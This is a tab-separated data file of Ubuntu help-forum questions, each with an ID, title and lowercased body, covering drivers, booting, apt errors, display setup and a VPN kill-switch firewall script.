269131	is there a gui application for adjusting monitor color ?	i have an asus laptop with an i5 processor , and an nvidia 610m graphics card , and an external monitor that is slightly pink . it was easy to fix this with the windows control panel . seeing that ubuntu lacks a gui for color adjustment/calibration i searched for the nvidia driver in hopes that i could use its control panel but my card , like many others , is n't supported ( for linux ) . i was able to import my old .icc profile from windows but it 's pretty useless to me now unless i can adjust it . and as fantastic as command-line is , color adjustment is something that really , really should be done with a gui . are there any applications out there that can create/adjust icc profiles ? are there any applications that can simply adjust the monitor colors ?
269133	how to install broadcom wireless driver in ubuntu 12.04 ?	i have hp compaq nx6110 . it has broadcom wifi brm4306 ( rev3 ) . in ubuntu 10.04 it works well , but in 12.04 , driver installation shows the following error : how do i resolve this ?
269134	desktop environment in ubuntu	i have a dell optiplex gx270 that i wanted to run ubuntu 12.04 on , after installing it on virtualbox it was very sluggish and was using 100 % cpu so i switched the desktop environment to lxde but it installed openbox and gnome/openbox is it safe to remove them is it also safe to remove unity ? if it is safe how would i remove them ? thanks
269136	bittorrent client that shows download and upload speed graph ?	utorrent on windows shows an informative download and upload speed graph . is there any bittorrent client for ubuntu that displays such information ?
269140	how to user multiple ssh keys with different accounts and hosts	i have multiple ssh keys and i have also have account on bitbucket and github . how when ever i use pull it gives me error : /var/www/proj $ git pull origin master conq : repository access denied . fatal : the remote end hung up unexpectedly or if i ssh the bitbucket website it gives errors ass public key denied : ~ $ ssh git @ bitbucket.org permission denied ( publickey ) . how can i get this resolved and use different keys with different accounts .
269146	clock issue in ubuntu 12.10	i could see that my clock does not work right . for example , now it 's 15:49 , and ubuntu has 16:10 . it takes the time from internet and i do n't know why change it when it wants . /etc/default/ntp it only has ntpd_opts='-g' i do n't know what file i have to see or change . could you help me ? ntpq -c pe shows internet connection : 100/10 on the other hand i tried differents ways and i ca n't fix it . it works fine for an hour and then it changes..
269158	how do i remove windows 7 when i am dual booting ubuntu 12.10 as well	i would like to remove the windows 7 os and only use the ubuntu 12.10 install . is there a way for it to work ?
269159	why will ubuntu one not start ?	if i try to open it , it tells me :
269161	left click not working after system resume	i have ubuntu 12.10 running on a macbook 3,1 and it has been running great . suddenly i have had a problem where anytime i close the lid and resume from standby the left click does not work . it actually looks as though it is stuck in the click state , so when i move the mouse it highlights everything on the screen . i can right click without a problem , so i can log out , sign back in and everything works again . i have the `` request login after returning from standby '' selected , but the login interface does not come up anymore . i can move the cursor around , i can right click everything , but left click will not come back unless i logout and log back in . sometimes , if i restart instead of logout , the click does not come back until i login , logout , then login again . help !
269163	samsung series 5 with bad output image quality	i 've just installed ubuntu 12.04.02 64bit on my samsung however i noticed bad hdmi / vga quality on a full hd tv . vgas : intel hd4000 and nvidia gt 630m 2gb resolutions : laptop : 1366x768 tv : 1920x1080 i 'm currently using only the intel vga , the nvidia drivers are not loaded . any idea ? thanks !
269165	how to find applications installed today ?	is there any command to list which applications have been installed today via apt-get or dpkg ? is there any other way to find this information ?
269173	i have recieved messages informing me that a ip address is trying to view my computer remotely .	how do i safeguard my computer from remote attempts to hack my system ? i have a hp g72 laptop and am running ubuntu 12.10 .
269174	how to dual-boot lubuntu 12.10 with windows 8 ?	all i want to know is how to get them to dual-boot . my laptop ( hp g62 ) does not come with secure boot . it is 3 years old .
269175	oracle in ubuntu	can i install oracle sql developer or oracle express edition in ubuntu 12.10 ( 32 bits ) using java 7 ? if not , what 's the `` best '' sql integrated development environment in this platform ?
269179	iptables rules to prevent unsafe connections on vpn drop , but how to allow reconnection to vpn again ?	i have a script which blocks unsafe disconnections to the internet when my vpn service fails/drops/disconnects , it works well . however i can only start this script when it has already established the link to the vpn , when it drops it does n't let the reconnection to the vpn service happen until i flush all the filter rules again . can someone please help with a rule to allow my wlan0 wifi adapter to allow the reconnection to the vpn service again so i can allow my network manager to 'automatically reconnect ' ? thanks . here 's my script so far : # flushes filter rules sudo iptables -f sudo iptables -t nat -f sudo iptables -t mangle -f # accept local connections always sudo iptables -a input -i lo -j accept # only allow connections to and from vpn server on the tun0 interface sudo iptables -a input -i tun0 -j accept sudo iptables -a input -s 10.10.10.10 -j accept sudo iptables -a input -j drop sudo iptables -a output -o tun0 -j accept sudo iptables -a output -d 10.10.10.10 -j accept sudo iptables -a input -j drop
269182	after installing ubuntu 12.10 desktop nothing displays after logging in	i installed ubuntu 12.10 desktop . there is no other os running on the box . i have not encrypted or partitioned the drive and went with the default values . when i login with the user i setup i do n't see menu items and the only thing that displays is the background theme . i switched to tty1 and ran sudo apt-get install compizconfig-settings-manager however when i run ccsm , i get '' /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init_.py:57 : could not open display warnings.warn ( str ( e ) , _gtk.warning ) '' when i switch back to the desktop from tty1 , i get a message stating compizconfig settings manager has closed unexpectedly . this is my third attempt booting from a usb . any advice ?
269185	which download manager is faster ?	its a while now im using linux ( lubuntu ) . since the very beginning days downthemall was my only download manager here ( maybe because i didnt find anything better ) . now just wanted to know is there any better and faster download manager out there for linux ? i mean faster ( its the most important aspect for me ) i heard things about fatrat , jdownloader , prozgui . but which one is the fastest ? flareget is also good , but its not open-souce ( in case of malware i never use closed-source )
269192	startup disk creator will not recognize my iso files , how to i fix this ?	i have downloaded the backtrack 5 r3 iso ( also an ubuntu studio 12.10/ubuntu 12.10 isos ) and i would like to burn it to a disk ( 4.7gb dvd-rom i have ) but i ca n't seem to get ubuntu to recognize it . startup disk creator/xfburn do n't recognize it , but they do allow me to load the isos into the program , just not burn it to a disk . i tried burning it with brasero and after i selected the iso in the select disk area it said please replace the disk with a supported cd or dvd i posted the image :
269193	how to i apply a patch to the kernel ?	i am a bit of a linux noob , so be weary of my inept understanding certain aspects of the os . anyway , i just loaded ubuntu onto my desktop machine ( dual booted ) and everything went fine . the only issue , is that ( i have been researching my problem for a while and have decided this is the issue ) the gaming keyboard that i have plugged in to the machine is n't supported by the kernel . i found this : http : //www.spinics.net/lists/linux-usb/msg62270.html which is somebody else who had the same problem , and fixed it by applying that patch to their kernel . how do i do that ? is there somewhere where i can just copy the code from that webpage , or is it more complicated than that ? p.s . it is n't an issue with hardware . the machine is dual booted , and it works perfectly fine with windows 7 , and it works perfectly in the bios and starting up until the moment that ubuntu loads .
269197	why does wireless on my oem 32bit notebook not work ?	i tried this sudo rfkill unblock all didnt work . my system : oem 32bit notebook 2gb ram , ubuntu 12.10
269204	ubuntu on login shows messages from the linux boot process	i face this weird problem when it comes to login to my ubuntu system . it does n't happen all the time.when it happens i press the enter button and after that the system shows the normal login screen . does anybody have any idea why is this happening ? i do not understand what the system is trying to tell me with all these messages that it shows .
269213	ubuntu 12.10 update did n't go well , os is messed app	i tried to update my ubuntu 12.04 to 12.10 . the update downloaded the needed files and then started setting up the packages . suddenly , i saw some weird things on the screen , and then i did n't have any top or left bar . i could n't close an app , could n't switch between apps ( alt+tab , windows key , any other shortcut did n't work ) . so i made a huge mistake and restarted the computer manually . when the computer booted , i chose to boot ubuntu , and then it told me that the file drive in /tmp was n't ready to use and i should press s to skip or m to boot manually , i pressed s but nothing happened , so yet again i did another restart and this time i chose to boot recovery mode . i chose to repair packages ( something like this , i do n't remember exactly ) , and it started going over all my packages . after it finished , i boot again and i hash a working os ( 12.10 ) but the screen resolution was n't good , so i logged in and again , did n't have any top or left bar , only a desktop . i managed to get into the file browser and saw that all of my files are there . how can i repair it ?
269214	playonlinux installation failed how do i fix it ?	so i was installing playonlinux as i wanted itunes . i typed in the terminal sudo apt-get install playonlinux and it went well . but i ca n't find it on my laptop anywhere . when i try to install it again it says e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? can i delete what has installed of playonlinux and if so , how ? or how do i reinstall it ? i 'm confused . thanks
269223	gnome shell : how do i map super-tab to app switcher ?	i am running ubuntu 12.04 under parallels on a macbook8,1 . i have a norwegian keyboard , so i have set the alt key to choose 3rd level , so i can acces square and curly brackets ( like on the mac ) . because of this i would like to have the app switcher on super-tab instead of alt-tab . how do i map super-tab to the app switcher in gnome shell ?
269225	ubuntu uefi boot issues	after quite a lot hurdles i got the ubuntu 12.04 installed on my machine in uefi mode but still one issue . it has created a separate boot option in uefi boot mode . so everytime i need to run ubuntu i have to go to bios setup , change the boot order and select ubuntu there and restart machine and similar for windows 8 . so is there any option i can add ubuntu boot details to windows boot loader or window booting details to ubuntu efi boot option . thanks
269227	requires installation of untrusted packages	i have been trying to update ubuntu , but these three updates below are not letting me update anything else . i have tried unselecting them from the update list but ubuntu still wonât update the rest . i really donât know what to do here ; a friend of mine put ubuntu onto my computer , which i only really use for internet and word processing . hopefully i am giving you enough information ; thanks for any advice or tips you might have . direct frame buffer graphics - shared libraries libdirectfb-1.2-9 touch screen library libts-0.0-0 tsconf touch screen library common files
269232	samsung series 5 getting hot	i 've just installed ubuntu 12.04.02 64bit on my samsung however i noticed it is getting too hot : ( it has 2 vgas ( intel hd4000 & nvidia gt 630m 2gb ) however i 'm using only intel . at least the nvidia* drivers are not loaded . any idea ? thanks !
269233	how to stop receipient 's signature being removed when replying to email in thunderbird ?	when i hit reply to an email , the recipient 's signature i removed if it is preceded by `` -- '' . is there a way to stop this in thunderbird ? many thanks !
269234	install kernel to other partition	i have two linux partitions , each running ubuntu 12.04 . one i was using as a legitimate partition for all my real computing . the other i was using as a honeycomb and a fallback partition . however , while working in the legit partition , i was apt-get installing and removing and i must have accidentally included a * or something . the kernel ended up being removed . when i rebooted , grub only listed my honeycomb kernels , so now i can only boot to the honeycomb . i was messing around with cinnamon and gnome and trying new things out and i got carried away . the entire filesystem from the legit partition seems to be intact , and the /boot directory had only a grub folder in it and a memtest file . how can i install a kernel into the legit partition , from the honeycomb ?
269236	how do i remove the amd catalyst drivers and go back to 12.04.2 default drivers	i installed amd catalyst drivers for ubuntu 12.04.2 , but i did n't see that it did n't support linux 3.5 kernel for ati 4xxx series , now i want to remove what i installed and go back to the old default drivers for ubuntu 12.04.2 . the main reason i want to do this is because most of the visual effects of unity is broken and does n't look good , and unity its not smooth as before . plus because of this i think steam also does n't start , not too sure about that though .
269239	conky shows a black background until i press ctrl+h in nautilus , then it becomes transparent	this should n't be a repost , i have looked through every article i can imagine is relevant , but nobody seems to have the same problem i do . first off , this is my first question ever , so i 'm sorry if i mess something up here . ok , when i boot my computer , i log in , and everything goes great . i 'm running ubuntu 12.04 64 bit with all kinds of compiz effects enabled , and conky running . i set up conky to autostart following the guide found here : http : //www.noobslab.com/2012/08/install-reloj-conky-in-ubuntulinux.html ( this is the exact theme i am using ) the only issue is , which i found to be very strange , is that conky shows a black box underneath it until i open up a nautilus window and hotkey to show hidden files . then it refreshes and is transparent like it should be . this is more of an inconvenience than anything , since i do have a work around for it , but i wanted to know if there was some way that this issue could be addressed without the need for me to push extra buttons every time i boot . my conky.rc and startup script are below : alignment top_right background yes cpu_avg_samples 2 default_color 000000 default_outline_color 000000 default_shade_color 000000 double_buffer yes draw_borders no draw_graph_borders no draw_outline no draw_shades no gap_x 15 gap_y 30 max_specials 1024 max_user_text 10000 maximum_width 100 minimum_size 300 400 net_avg_samples 2 no_buffers yes override_utf8_locale yes own_window yes own_window_colour 000000 own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager own_window_transparent yes own_window_type override pad_percents 2 short_units yes stippled_borders 3 text_buffer_size 8000 total_run_times 0 update_interval 3.0 uppercase no use_spacer right use_xft yes xftalpha 1 text $ { offset 8 } $ { voffset 16 } $ { font oldsansblack : size=22 } $ { color # 232323 } $ { time % i } $ { offset 12 } $ { time % m } $ { font } $ { font pftempestafivecondensed : size=6 } $ { color white } cpu : $ cpu % mem : $ mem batt : $ { battery_percent bat0 } % home : $ { fs_used_perc /home } % root : $ { fs_used_perc /root } % free : $ { fs_free_perc /home } % swap : $ { swapperc } % cpu : $ { top cpu 1 } % $ { top name 1 } mem : $ { top_mem mem 1 } % $ { top_mem name 1 } network : ul : $ { upspeed wlan0 } dl : $ { downspeed wlan0 } $ { image ~/.conky/backpro.png 115x63 -p -1,204 } $ { image ~/.conky/backdisk.png 115x63 -p -1,138 } $ { image ~/.conky/back.png 115x63 -p -1,6 } $ { image ~/.conky/backsys.png 115x63 -p -1,72 } $ { image ~/.conky/backnet.png 115x63 -p -1,270 } start conky script : # ! /bin/sh sleep 20 conky -d -c ~/.conkyrc exit there 's not really anything else i can think of that would be relevant . i have used ubuntu tweak to change some settings with unity and gconf to change some transparency settings for menus . if there is other information that would be helpful , i would be more than happy to throw it up here on request . thank you for any help guys !
269240	trying to install erlang on ubuntu 12.04 , error with make install	i am trying to install erlang r16b on my laptop with ubuntu 12.04 . i get an error which says : /usr/bin/install -c -d `` /usr/local/lib/erlang '' /usr/bin/install : can not change permissions of `/usr/local/lib/erlang ' : no such file or directory make : *** [ install.dirs ] error 1 i 'm following a tutorial on docs.basho.com to install it and well , they did n't cover what to do and i have a hard time finding answers on google . i found another post on erlang.org about installing it here but it did n't help me and it was just about generally installing it , not about errors like these . anyhow , i hope somebody has any idea on what i can do to fix this : ) i intend to learn erlang to basically make a server , to learn how it works . my own little project .
269242	my brand new hp notebook wo n't boot ubuntu 12.10 from usb flash drive , but i can boot the usb flash drive from other computers . how can i fix ?	my brand new hp notebook wo n't boot ubuntu 12.10 from usb flash drive , but i can boot the usb flash drive from other computers . it will start to load on my notebook but when it gets to the ubuntu screen it freezes . how can i fix ?
269245	apt-get `` broken packages ''	while installing python-dev : sudo apt-get install python-dev i am getting the following error : the following packages have unmet dependencies : python2.7-dev : depends : python2.7 ( = 2.7.3-0ubuntu3 ) but 2.7.3-0ubuntu3.1 is to be installed depends : libpython2.7 ( = 2.7.3-0ubuntu3 ) but 2.7.3-0ubuntu3.1 is to be installed e : unable to correct problems , you have held broken packages . i already have python2.7 and libpython2.7 installed . i do n't understand `` 0ubuntu3 '' and `` 0ubuntu3.1 '' means in the error . i am on ubuntu 12.04 . i 've tried apt-get update , apt-get upgrade several times . i 've tried googling the problem , but ca n't find any solution to it . i do n't want to autoremove python , its gon na remove 300mb of stuff , so i 'm guessing more than one thing will stop working . since then i have reinstalled ubuntu 12.04 and have pretty much installed nothing after that , no security updates etc . too . this time python-dev and libboost-dev installed without a hiccup . but am facing the same issue with freeglut3-dev : the following packages have unmet dependencies : freeglut3-dev : depends : libgl1-mesa-dev but it is not going to be installed or libgl-dev depends : libglu1-mesa-dev but it is not going to be installed or libglu-dev e : unable to correct problems , you have held broken packages . the feedback i 've gotten till now suggests there should be related to the package manager . has anyone faced this issue ? can someone help please ? thanks
269248	how to grant apt-get permissions required to install software ?	i am new to linux , can anyone be kind enough to help me know how to install software from the terminal ? i tried to install java by entering the command in the terminal sudo apt-get install openjdk-7-jdk but i get errors , e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i also tried root su - but it says that the password is incorrect , so what is root ? advance thanks for the help guys .
269249	permission denied error when installing django	oserror : [ errno 13 ] permission denied : '/usr/share/pyshared/django-1.4.1.egg-info' storing complete log in /home/lightning/.pip/pip.log lightning @ rigel5 : ~ $ os : ubuntu 12.10 32 bit 2gb ram trying to install this via tutorial returns this error .
269255	just installed ubuntu but how do i get it to boot	i just installed ubuntu 12.10 on my new hp-2326 pc which came with windows 8 . i installed ubuntu from a cd . i chose to partition my harddrive and keep windows . the install was successful but when i reboot it goes directly in windows . can somebody please help ? p.s . here are the step i found to install ubuntu from dvd . here are the steps i followed to get the pc to boot from the dvd drive : at start of boot up i hit f10 to get to hp setup screen . then moved to right to security screen . then down to secure boot configuration . at the red screen f10 to accept . then disable secure boot and also disable fast boot . enable legacy support . back to left to file , highlight save changes and exit . reboot and then the pc boots from the dvd drive .
269257	how to activate gcc 4.7 version ?	i have gcc 4.6.3 installed : gcc -- version gcc ( ubuntu/linaro 4.6.3-1ubuntu5 ) 4.6.3 i have installed newer version : apt-get install gcc-4.7 but i still get result `` gcc 4.6.3 '' when i type gcc -- version . how to fix it ? i am using ubuntu 12.04 and i have done sudo apt-get update sudo apt-get upgrade
269259	possible to pen-test ubuntu from within ubuntu ?	i have metasploit and i would like to test my system for vulnerabilities . is this possible , or am i trying to do the impossible ? ~thanks !
269261	x-server wo n't start - black screen ( after purging *nvidia* files on hd4000 system )	for about three months now i 've been trying to fix a problem with my x-server . the problem occured after lightdm starts as usual . after entering the password to my account the loading-screen showed up , but returned me to lightdm . now i 've ended up with a black screen , trying to solve the problem . things i tried so far : created a test account previously : this worked , i can login without any problems chown all .xauthority files to my user chown all files in /home/.encryptfs/myaccount/ . * to my user purged nvidia driver files after i read about similiar problems , caused by nvidia driver updates : this resulted in the black screen ( so screen is on but doesnt show anything when started with standard grub options ) . i do n't understand how purging a useless driver on a intel hd 4000 graphics machine can result in a black screen . this confuses me most . reconfiguring xserver-xorg set kdm instead of lightdm start xserver from console using startx -v : first resulted in the errors attached below , now delivers x : /tmp/.x11-unix has suspicious mode ( not 1777 ) or is not a directory , aborting . xinit : giving up xinit : connection to server lost sudo apt-get install -- reinstall xserver-xorg xorg plymouth-x11 reinstalled the kernel : i ca n't explain myself how this could possibly not fix the black screen problem , the newer kernels as mine ( ... 0.23 ) all have the hd4000 drivers on board , it must have the correct drivers now ! so in my opinion this ca n't be a graphics issue , but the blackscreen appeared the next time after purging the nvidia drivers . add the x-swat repository and install hd4000-driver from there : again nothing boot from live-media : drops back to busybox initramfs interface boot without quiet option boot without splash : enables me to get at least reliable access to console login & interface boot with nomodeset quiet splash : works sometimes an brings me to console login & interface , sometimes not as mentioned a new account created as a test worked , so i thought there might be a problem with the authorities . but checking an changing the owners ' rights of files known to cause such problems . unfortunately this did n't solve the problem . after some webresearch i found out that nvidia driver updates recently caused similiar problems , so i removed and purged the driver files . i expected that there would be a image on the display though , like in vga-mode in windows os . this is not the case , so now i 'm facing a blackscreen problem in addition , that somehow cant be fixed by reinstalling the drivers , or never was caused by purging the nvidia-drivers . what i did before the xinit problem in the first place appeared : - i added this script to the autostart : # ! /bin/bash # ! /bin/sh # wait for the dock state to change sleep 2.0 docked= $ ( cat /sys/devices/platform/dock.0/docked ) case `` $ docked '' in `` 0 '' ) # undocked event - lets remove all connected outputs apart from lvds for output in $ ( /usr/bin/xrandr -d :0.0 -- verbose|grep `` connected '' |grep -v lvds|awk ' { print $ 1 } ' ) do /usr/bin/xrandr -d :0.0 -- output $ output -- off done xrandr -- output lvds1 -- rotation normal xsetwacom set `` wacom isdv4 90 pen stylus '' maptooutput lvds1 xsetwacom set `` wacom isdv4 90 pen eraser '' maptooutput lvds1 # rotates the tablet input to the according position ( half=180째 , ( c ) cw= ( counter ) clockwise , none=normal ) xsetwacom set `` wacom isdv4 90 pen stylus '' rotate none # if multiouch present set : xsetwacom set `` wacom isdv4 e6 finger touch '' rotate half xsetwacom set `` wacom isdv4 90 pen eraser '' rotate none ; ; `` 1 '' ) # # rotates internal laptop display lvds1 to inverted xrandr -- output hdmi2 -- auto -- above lvds1 xrandr -- output lvds1 -- rotation inverted xsetwacom set `` wacom isdv4 90 pen stylus '' maptooutput lvds1 xsetwacom set `` wacom isdv4 90 pen eraser '' maptooutput lvds1 # rotates the tablet input to the according position ( half=180째 , ( c ) cw= ( counter ) clockwise , none=normal ) xsetwacom set `` wacom isdv4 90 pen stylus '' rotate half # if multiouch present set : xsetwacom set `` wacom isdv4 e6 finger touch '' rotate half xsetwacom set `` wacom isdv4 90 pen eraser '' rotate half ; ; esac exit 0 some standard updates from canonical were installed i use : kubuntu 12.10 lenovo x230t intel core i7 3520m with integrated hd 4000 graphics additional information about the initial errors , before purging nvidia : output of startx -v console lines after attempt to login via lightdm output of ls -la 1 output of ls -la 2 output of ls -la 3 output of ls -la 4 output of ls -la 5
269265	i ca n't connect to wireless it 's keep asking for authenticating code	i recently downloaded ubuntu and installed it . every thing works just fine , but when i want connect to my wireless network , it says enter authenticating code . when i enter the code correctly , 2 or 3 minutes later its want authenticating code again . i even removed my password from my wireless settings but it want authenticating code again ! this is my first time using linux .
269266	building webkit from source	i tried to install the webkit applicaion from sources using this manual : https : //help.ubuntu.com/community/webkit when i type : ./autogen.sh -- prefix=/usr the following error occurs : checking for _file_offset_bits value needed for large files ... 64 configure : error : compiler gcc > = 4.7 or clang > = 3.0 is required for c++ compilation when i type : gcc -- version it responds : gcc ( ubuntu/linaro 4.7.2-11precise2 ) 4.7.2 hence the error does not concern gcc version . why the execution fails ? edited : previous problem is solved by updating g++ to 4.7 . but the following error occurs further : checking for gail ... no configure : error : package requirements ( gail-3.0 > = 3.0 ) were not met : no package 'gail-3.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables gail_cflags and gail_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . i have apt-get install gail-3.0 , but the error remains . edited : also did : apt-get install gail-3.0-dev apt-get build-dep webkit but further missing packages revealed : error : package requirements ( libsoup-2.4 > = 2.40.0 ) were not met : requested 'libsoup-2.4 > = 2.40.0 ' but version of libsoup is 2.38.1 consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables libsoup_cflags and libsoup_libs to avoid the need to call pkg-config . see the pkg-config man page for more details .
269271	entering fullscreen in mednafen with one monitor ?	i 'm running ubuntu 12.04.2 lts x86_64 with two mismatched monitors : one , a laptop @ 1366x768 native , the other an asus @ 1920x1080 native res . how can i enter fullscreen with mednafen displaying on just one monitor , leaving the other one untouched ? the problem with just hitting atl+enter after booting up a game normally is my large display shrinks and both monitors mirror ( and stay mirrored afterward ) . this is just a pain and passing arguments like -pcfx.xres 1366 -pcfx.yres 768 from a bash script just results in the game being displayed across both monitors . if anyone has some tips that i could learn from , it 'd be appreciated . edits : if it helps , compizconfig is set to detect my outputs ( display settings ) . here is the output when running a game via bash script initializing sound ... using `` alsa '' audio driver with sexyal 's default device selection.alsa error : snd_pcm_open ( & alsa_pcm , id ? id : `` hw:0 '' , snd_pcm_stream_playback , 0 ) device or resource busy error opening a sound device . initializing video ... video driver : opengl video mode : 3286 x 1080 x 32 bpp pixel shader : none fullscreen : yes special scaler : none scanlines : off destination rectangle : x=922 , y=60 , w=1440 , h=960 opengl implementation : tungsten graphics , inc mesa dri intel ( r ) ironlake mobile 2.1 mesa 8.0.4 checking extensions : gl_arb_texture_non_power_of_two found . using non-power-of-2 sized textures . checking maximum texture size ... apparently it is at least : 8192 x 8192 using gl_bgra , gl_unsigned_int_8_8_8_8_rev for texture source data .
269273	how can i make my onboard hdmi to work with my gpu ?	i want to use my tv as a second monitor through hdmi in the motherboard , while use my main monitor through my graphics card since my motherboard is the only one who allows it . ubuntu wo n't detect my tv unless i make igpu ( integrated in the motherboard ) my primary display , if i do that , my gpu is disabled , and i will have to connect the vga to my motherboard . it works but i run into issues with compiz , but still i do n't use my real gpu , only everything on the motherboard and the integrated graphics card . how do i make ubuntu detect my igpu and with my gpu as well and not only choose my primary one ? ( that way hdmi on the tv is rendered by the cpu graphics , while my main monitor is my real gpu . ) thanks : ) these are my specs : cpu : i7 2600k gpu : hd 4870 motherboard : asus p8z68-v pro ( z68 )
269275	how to default social media status to `` available '' ?	is there any way to default the below picture to `` available '' , so i do n't have to remember ( i never do ) to manually change it every time . i end up never utilizing ubuntu 's features because i always forget to do this . any help appreciated ! how to change it ?
269276	only 4gb ram out of 8 shown in ubuntu 12.04 lts 64 bit and in bios	i have seen similar questions and answers but mine is : a. i have 8gb ram installed b . my bios shows 4gb c. ubuntu 's system setting/details shows 3.7gb ( but this small decrease is not a great issue for me ) question : is this a possible ubuntu issue or it has to do with my pc hardware ( faulty memory , etc.. ) ? sorry , i am a noobie , but what i mean is : if it should be an ubuntu issue , would the bios show the right ram amount ( 8gb ) ? or ubuntu `` affects '' also what is shown in the bios settings ? thanks a lot in advance for your patience and for your help with this . alex
269280	`` could not retrieve the required disk image files '' when using wubi.exe + iso in same folder	i 've downloaded ubuntu 12.04 iso + wubi installer and put the both of them in the same directory . i get an error when running the installer ( with no internet connection ) . here 's the log : http : //pastebin.com/tzv4ewnx what am i doing wrong ? i 'm trying to install the 64 bit version on windows 7 .
269283	what is the reason for using & & instead of ; to place to commands on the same line ?	not being an expert in either linux not unix i 'm wondering what the difference between these 2 method of stringing 2 commands on the same line ? i see no difference in output in this simplistic example pete $ date ; time sun mar 17 19:37:20 edt 2013 real 0m0.000s user 0m0.000s sys 0m0.000s pete $ date & & time sun mar 17 19:37:46 edt 2013 real 0m0.000s user 0m0.000s sys 0m0.000s this has n't caused any problems - i 'm just curious..
269284	laptop screen wo n't show up	i just installed ubuntu 12.04 on my laptop , and for some reason i ca n't use the laptop screen without an external monitor ; it functions fine as the only monitor in windows 8 , and it functions fine as the primary monitory in a dual monitor setup in ubuntu ... it just does n't work as the only monitor in ubuntu . any ideas ? here is the laptop : http : //www.newegg.com/product/product.aspx ? item=n82e16834215665
269285	various segfaults in syslog ; firefox , apt-get and other apps broken	i am working on an ubuntu 12.04 installation that has recently started misbehaving . it is used by multiple people at an office , so it 's possible someone messed things up ( although the only user who is an administrator is pretty smart and keeps things updated ) . in any case i do n't know how it ended up in this state . the problem is that firefox , update manager , and possibly other programs no longer work . it boots up to a normal-looking desktop . thunderbird and libreoffice seem to work fine and i have internet connectivity , so the system is n't completely broken . i looked at /var/log/syslog and see a bunch of segmentation faults . i 'm puzzled by the pattern of broken libraries ... they seem unrelated , and i am at a loss to explain what happened . i 'll continue to investigate but if anyone has any ideas , i 'd love to hear them ! note that libapt-pkg.so is broken , so i ca n't seem to get the system to clean itself up . i removed *.bin from /var/cache/apt as mentioned elsewhere , but that did n't help . here is /var/log/syslog : mar 17 15:52:53 hostname rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 493 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped mar 17 15:52:54 hostname rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 493 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped mar 17 15:53:18 hostname anacron [ 895 ] : job `cron.daily ' terminated mar 17 15:53:18 hostname anacron [ 895 ] : normal exit ( 1 job run ) mar 17 15:53:55 hostname kernel : [ 895.453234 ] apt-get [ 2737 ] : segfault at bfec00f7 ip 0061b1c4 sp bfa05710 error 4 in libapt-pkg.so.4.12.0 [ 5bf000+124000 ] mar 17 15:54:28 hostname kernel : [ 928.805036 ] apt-get [ 2973 ] : segfault at bffdbdf7 ip 00c9d1c4 sp bfeda2c0 error 4 in libapt-pkg.so.4.12.0 [ c41000+124000 ] mar 17 15:54:30 hostname kernel : [ 931.007931 ] apt-get [ 2978 ] : segfault at bfee85f7 ip 00e201c4 sp bf823c40 error 4 in libapt-pkg.so.4.12.0 [ dc4000+124000 ] mar 17 15:54:39 hostname kernel : [ 940.135040 ] apt-get [ 2991 ] : segfault at bfd3e5f7 ip 00c941c4 sp bfd1dc80 error 4 in libapt-pkg.so.4.12.0 [ c38000+124000 ] mar 17 15:54:43 hostname kernel : [ 943.368954 ] apt-get [ 2996 ] : segfault at bfff30f7 ip 0058e1c4 sp bfbf2520 error 4 in libapt-pkg.so.4.12.0 [ 532000+124000 ] mar 17 15:54:47 hostname kernel : [ 948.090732 ] apt-get [ 3002 ] : segfault at bfdfe0f7 ip 008701c4 sp bfde9720 error 4 in libapt-pkg.so.4.12.0 [ 814000+124000 ] mar 17 15:55:34 hostname kernel : [ 994.745018 ] firefox [ 3034 ] general protection ip:284718 sp : bfdf9999 error:0 in libstdc++.so.6.0.16 [ 25a000+d8000 ] mar 17 15:56:05 hostname kernel : [ 1026.148231 ] apt-get [ 3038 ] : segfault at ac39d81f ip 0016c20c sp bfe3e220 error 4 in libapt-pkg.so.4.12.0 [ 110000+124000 ] mar 17 15:58:34 hostname kernel : [ 1175.049420 ] firefox [ 3057 ] : segfault at 0 ip 0028472f sp bf91badc error 6 in libc-2.15.so [ 12e000+1a3000 ] mar 17 15:59:00 hostname dbus [ 467 ] : [ system ] activating service name='org.debian.apt ' ( using servicehelper ) mar 17 15:59:00 hostname aptdaemon : info : initializing daemon mar 17 15:59:00 hostname dbus [ 467 ] : [ system ] successfully activated service 'org.debian.apt' mar 17 15:59:01 hostname aptdaemon.packagekit : info : initializing packagekit compat layer mar 17 15:59:01 hostname kernel : [ 1201.659743 ] software-center [ 3060 ] : segfault at bfb5f8f7 ip 097ab1c4 sp bfb11d60 error 4 in libapt-pkg.so.4.12.0 [ 974f000+124000 ] mar 17 16:00:45 hostname kernel : [ 1305.806837 ] firefox [ 3092 ] : segfault at 459c84eb ip 01ee43f1 sp bfb6ebbc error 4 in libxul.so [ fa8000+1d11000 ] mar 17 16:01:26 hostname kernel : [ 1346.971439 ] firefox [ 3122 ] general protection ip:284706 sp : bfc543ec error:0 in libc-2.15.so [ 1f5000+1a3000 ] mar 17 16:01:30 hostname kernel : [ 1351.221917 ] firefox [ 3127 ] : segfault at 9fffe7ad ip 00284716 sp bf86b0bc error 6 in libpangoft2-1.0.so.0.3000.0 [ 283000+2a000 ] mar 17 16:04:01 hostname aptdaemon : info : quitting due to inactivity mar 17 16:04:01 hostname aptdaemon : info : quitting was requested i 'm hoping i do n't need to reinstall from scratch .
269310	permission issues with command in rc.local	i am using a command to start a screen session and run a bash script for a user . /bin/su username -c `` /usr/bin/screen -dms test bash -c '/home/username/test.sh ; exec bash ' '' when i boot , i am seeing the screen session appear for that user , but when i open it , i see a permission denied error . i checked permissions on the file and it is : -rw-rw-r -- 1 username www-data 816 feb 18 00:59 test.sh anyone have a theory why i am seeing this error ? i can run the script no problem when i am logged in as username .
